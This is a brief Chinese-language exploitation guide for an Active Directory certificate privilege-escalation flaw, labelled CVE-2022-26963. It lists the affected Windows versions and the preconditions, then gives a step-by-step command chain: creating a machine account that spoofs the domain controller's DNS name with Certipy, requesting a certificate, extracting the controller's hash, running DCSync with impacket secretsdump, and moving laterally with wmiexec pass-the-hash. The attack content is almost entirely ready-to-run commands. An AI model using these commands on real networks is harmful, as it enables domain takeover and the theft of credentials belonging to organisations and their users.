CVE-2022-26963AD域权限提升
目录
受影响的 Windows 版本:
Windows 8.1
Windows 10 Version 1607, 1809,1909, 2004, 20H2, 21H1, 21H2
Windows 11
Windows Server 2008,2012,2016,2019,2022
由于计算机账户中的dNSHostName不具有唯一性,可以对其进行伪造,冒充高权限的域空机器账户,实现权限提升的效果
漏洞利用条件:
- 能够创建机器账户(或拥有某机器账户的控制权)
- 对机器账户具有修改属性的权限
- 目标未打相应补丁
攻击
https://github.com/ly4k/Certipy
添加一个机器账户,并设置其dnshostname改为与dc相同
certipy account create chinfo.testlab/test1:'Syclover!'@DC.chinfo.testlab -user "hacker" -dns "DC.chinfo.testlab"
如果报错就换种写法
certipy account create -u gasstest2@a.com.cn -p 'asdnsad' -user 'aa' -dns 'DC1$' -dc-ip 192.168.1.1
获取机器账户的machine证书
certipy req chinfo.testlab/'hacker$:Qv8A7bBHFtwpPhRj'@DC.chinfo.testlab -ca chinfo-DC-CA -template Machine
获得机器账户的hash
certipy auth -pfx dc.pfx
此时获得的hash是dc机器用户的hash,这个hash不能直接拿来登录,但是可以拿来dcsync获取hash
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py 'chinfo.testlab/dc$@dc.chinfo.testlab' -hashes b0d7d9976a8006c910f50030088730f8:b0d7d9976a8006c910f50030088730f8
获取hash后进行横向
python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2fd54b5d964ccb69be6bdb69d76fad65 ADMINISTRATOR@1.1.1.2